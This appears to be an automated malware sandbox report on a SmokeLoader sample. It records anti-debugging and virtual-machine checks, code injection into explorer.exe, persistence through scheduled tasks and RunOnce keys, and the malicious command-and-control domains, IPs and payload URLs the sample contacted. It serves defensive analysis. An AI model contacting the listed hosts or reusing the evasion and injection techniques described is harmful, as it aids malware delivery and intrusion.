      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.2102045759.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000002.00000000.2100573237.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
      Source: explorer.exe, 00000002.00000000.2102045759.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000002.00000000.2105745637.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000002.00000000.2102045759.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000002.00000000.2102045759.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
      Source: explorer.exe, 00000002.00000000.2100573237.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.2105745637.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
      Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B092B mov eax, dword ptr fs:[00000030h]0_2_005B092B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B0D90 mov eax, dword ptr fs:[00000030h]0_2_005B0D90
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084936C push dword ptr fs:[00000030h]0_2_0084936C
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00469BDC push dword ptr fs:[00000030h]4_2_00469BDC
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_005A092B mov eax, dword ptr fs:[00000030h]4_2_005A092B
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_005A0D90 mov eax, dword ptr fs:[00000030h]4_2_005A0D90
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417B5E SetUnhandledExceptionFilter,Sleep,0_2_00417B5E
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00417B5E SetUnhandledExceptionFilter,Sleep,4_2_00417B5E

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Benign windows process drops PE files
      Source: C:\Windows\explorer.exeFile created: C9F5.exe.2.drJump to dropped file
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 211.202.224.10 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.139 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.137 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 64.190.113.113 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 127.0.0.127 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 167.235.128.153 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
      Allocates memory in foreign processes
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory allocated: C:\Windows\explorer.exe base: 1210000 protect: page read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory allocated: C:\Windows\explorer.exe base: 3000000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory allocated: C:\Windows\explorer.exe base: 84C0000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory allocated: C:\Windows\explorer.exe base: 84E0000 protect: page execute and read and writeJump to behavior
      Changes memory attributes in foreign processes to executable or writable
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory protected: C:\Windows\explorer.exe base: 1210000 protect: page execute and read and writeJump to behavior
      Creates a thread in another existing process (thread injection)
      Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 85019D0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdThread created: unknown EIP: 85219D0Jump to behavior
      Injects code into the Windows Explorer (explorer.exe)
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: PID: 1028 base: 1210000 value: 20Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: PID: 1028 base: 1211000 value: 48Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: PID: 1028 base: 84E0030 value: 00Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Writes to foreign memory regions
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: C:\Windows\explorer.exe base: 1210000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: C:\Windows\explorer.exe base: 1211000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMemory written: C:\Windows\explorer.exe base: 84E0030Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50DF310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership,7_2_00007FF7D50DF310
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
      Source: explorer.exe, 00000002.00000000.2101008697.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000002.00000000.2104592909.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2101008697.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000000.2101008697.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000002.00000000.2101008697.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000002.00000000.2100573237.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman

      Stealing of Sensitive Information

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
      Windows Management Instrumentation      		11
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping841
      Security Software Discovery      		Remote Services11
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		72
      Process Injection      		35
      Virtualization/Sandbox Evasion      		LSASS Memory35
      Virtualization/Sandbox Evasion      		Remote Desktop ProtocolData from Removable Media13
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		Security Account Manager3
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading      		72
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture125
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Hidden Files and Directories      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information      		Cached Domain Credentials223
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
      Software Packing      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      File Deletion      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1478859 Sample: file.exe Startdate: 23/07/2024 Architecture: WINDOWS Score: 100 38 mussangroup.com 2->38 40 gebeus.ru 2->40 42 evilos.cc 2->42 58 Multi AV Scanner detection for domain / URL 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 7 other signatures 2->64 9 file.exe 2->9         started        12 ajjwvsd 2->12         started        signatures3 process4 signatures5 74 Detected unpacking (changes PE section rights) 9->74 76 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->76 78 Maps a DLL or memory area into another process 9->78 86 3 other signatures 9->86 14 explorer.exe 108 6 9->14 injected 80 Multi AV Scanner detection for dropped file 12->80 82 Machine Learning detection for dropped file 12->82 84 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->84 process6 dnsIp7 44 mussangroup.com 185.149.100.242, 443, 49731 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi Turkey 14->44 46 64.190.113.113, 49727, 80 TRAVELCLICKCORP1US United States 14->46 48 7 other IPs or domains 14->48 32 C:\Users\user\AppData\Roaming\ajjwvsd, PE32 14->32 dropped 34 C:\Users\user\AppData\Local\Temp\C9F5.exe, PE32+ 14->34 dropped 36 C:\Users\user\...\ajjwvsd:Zone.Identifier, ASCII 14->36 dropped 50 System process connects to network (likely due to code injection or exploit) 14->50 52 Benign windows process drops PE files 14->52 54 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 14->54 56 5 other signatures 14->56 19 C9F5.exe 1 14->19         started        22 C9F5.exe 1 14->22         started        24 C9F5.exe 1 14->24         started        file8 signatures9 process10 signatures11 66 Check for Windows Defender sandbox 19->66 68 Machine Learning detection for dropped file 19->68 70 Changes memory attributes in foreign processes to executable or writable 19->70 72 3 other signatures 19->72 26 conhost.exe 19->26         started        28 conhost.exe 22->28         started        30 conhost.exe 24->30         started        process12

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      file.exe39%ReversingLabsWin32.Trojan.BotX
      file.exe41%VirustotalBrowse
      file.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\C9F5.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\ajjwvsd100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\ajjwvsd39%ReversingLabsWin32.Trojan.BotX
      C:\Users\user\AppData\Roaming\ajjwvsd41%VirustotalBrowse

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      gebeus.ru17%VirustotalBrowse
      evilos.cc18%VirustotalBrowse
      mussangroup.com14%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      http://crl.v0%URL Reputationsafe
      https://outlook.com0%URL Reputationsafe
      https://word.office.comon0%Avira URL Cloudsafe
      https://mussangroup.com/wp-content/images/pic1.jpg100%Avira URL Cloudmalware
      https://107.173.160.139/0%Avira URL Cloudsafe
      http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
      https://107.173.160.137/0%Avira URL Cloudsafe
      http://cx5519.com/tmp/index.php100%Avira URL Cloudmalware
      http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
      https://167.235.128.153/0%Avira URL Cloudsafe
      https://107.173.160.139/3%VirustotalBrowse
      http://gebeus.ru/tmp/index.php100%Avira URL Cloudmalware
      http://office-techs.biz/tmp/index.php100%Avira URL Cloudmalware
      http://www.oberhumer.com0%Avira URL Cloudsafe
      http://evilos.cc/tmp/index.php100%Avira URL Cloudmalware
      http://cx5519.com/tmp/index.php12%VirustotalBrowse
      http://gebeus.ru/tmp/index.php18%VirustotalBrowse
      https://mussangroup.com/wp-content/images/pic1.jpg6%VirustotalBrowse
      https://wns.windows.com/)s0%Avira URL Cloudsafe
      http://www.oberhumer.com0%VirustotalBrowse
      http://office-techs.biz/tmp/index.php14%VirustotalBrowse
      http://evilos.cc/tmp/index.php17%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      evilos.cc
      		127.0.0.127
      		truetrueunknown
      gebeus.ru
      		58.151.148.90
      		truetrueunknown
      mussangroup.com
      		185.149.100.242
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://mussangroup.com/wp-content/images/pic1.jpgtrue
      • 6%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      https://107.173.160.139/true
      • 3%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://107.173.160.137/true
      • Avira URL Cloud: safe
      		unknown
      http://cx5519.com/tmp/index.phptrue
      • 12%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      https://167.235.128.153/true
      • Avira URL Cloud: safe
      		unknown
      http://gebeus.ru/tmp/index.phptrue
      • 18%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      http://office-techs.biz/tmp/index.phptrue
      • 14%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      http://evilos.cc/tmp/index.phptrue
      • 17%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://word.office.comonexplorer.exe, 00000002.00000000.2108451661.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.2112085690.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2112085690.000000000C861000.00000004.00000001.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2105745637.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.2111355914.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2111355914.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://api.msn.com/explorer.exe, 00000002.00000000.2108451661.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://excel.office.comexplorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://schemas.microexplorer.exe, 00000002.00000000.2106911547.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107728483.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107759847.0000000008890000.00000002.00000001.00040000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://crl.vexplorer.exe, 00000002.00000000.2100573237.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://outlook.comexplorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.oberhumer.comC9F5.exe, C9F5.exe.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://wns.windows.com/)sexplorer.exe, 00000002.00000000.2108451661.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      211.202.224.10
      		unknownKorea Republic of
      		9318SKB-ASSKBroadbandCoLtdKRtrue
      77.221.157.163
      		unknownRussian Federation
      		30968INFOBOX-ASInfoboxruAutonomousSystemRUtrue
      107.173.160.139
      		unknownUnited States
      		36352AS-COLOCROSSINGUStrue
      107.173.160.137
      		unknownUnited States
      		36352AS-COLOCROSSINGUStrue
      58.151.148.90
      		gebeus.ruKorea Republic of
      		17858POWERVIS-AS-KRLGPOWERCOMMKRtrue
      167.235.128.153
      		unknownUnited States
      		3525ALBERTSONSUStrue
      185.149.100.242
      		mussangroup.comTurkey
      		209853VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLitrue
      64.190.113.113
      		unknownUnited States
      		26646TRAVELCLICKCORP1UStrue

      Private

      IP
      127.0.0.127

      General Information

      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1478859
      Start date and time:2024-07-23 06:14:08 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 10m 5s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:12
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:1
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:file.exe
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@11/4@9/9
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 56
      • Number of non-executed functions: 49
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Override analysis time to 240000 for current running targets taking high CPU consumption

      Warnings

      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size getting too big, too many NtDeviceIoControlFile calls found.
      • Report size getting too big, too many NtEnumerateKey calls found.
      • Report size getting too big, too many NtOpenKey calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      00:15:06API Interceptor544768x Sleep call for process: explorer.exe modified
      06:15:24Task SchedulerRun new task: Firefox Default Browser Agent 142B09FF234E17C0 path: C:\Users\user\AppData\Roaming\ajjwvsd
      06:17:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#1757_8yUscnjrUY C:\Users\user\AppData\Local\Temp\C9F5.exe
      06:17:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#1757_8yUscnjrUY C:\Users\user\AppData\Local\Temp\C9F5.exe

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      211.202.224.102llKbb9pR7.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
      • sajdfue.com/files/1/build3.exe
      SecuriteInfo.com.Trojan.Siggen28.25504.27914.23637.exeGet hashmaliciousGlupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
      • nidoe.org/tmp/index.php
      file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
      • sdfjhuz.com/dl/build2.exe
      77.221.157.163file.exeGet hashmaliciousSmokeLoaderBrowse
      • 77.221.157.163/systemd.exe
      file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
      • 77.221.157.163/systemd.exe
      cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
      • 77.221.157.163/systemd.exe
      8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
      • 77.221.157.163/systemd.exe
      rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
      • 77.221.157.163/systemd.exe
      Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
      • 77.221.157.163/systemd.exe
      uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
      • 77.221.157.163/systemd.exe
      y2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
      • 77.221.157.163/systemd.exe
      SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
      • 77.221.157.163/systemd.exe
      WwqOJ8GXw7.exeGet hashmaliciousSmokeLoaderBrowse
      • 77.221.157.163/systemd.exe
      107.173.160.139file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
        cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
          8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
            rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
              Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
                uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                  y2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
                    SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
                      WwqOJ8GXw7.exeGet hashmaliciousSmokeLoaderBrowse
                        file.exeGet hashmaliciousSmokeLoaderBrowse
                          107.173.160.137file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                            cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
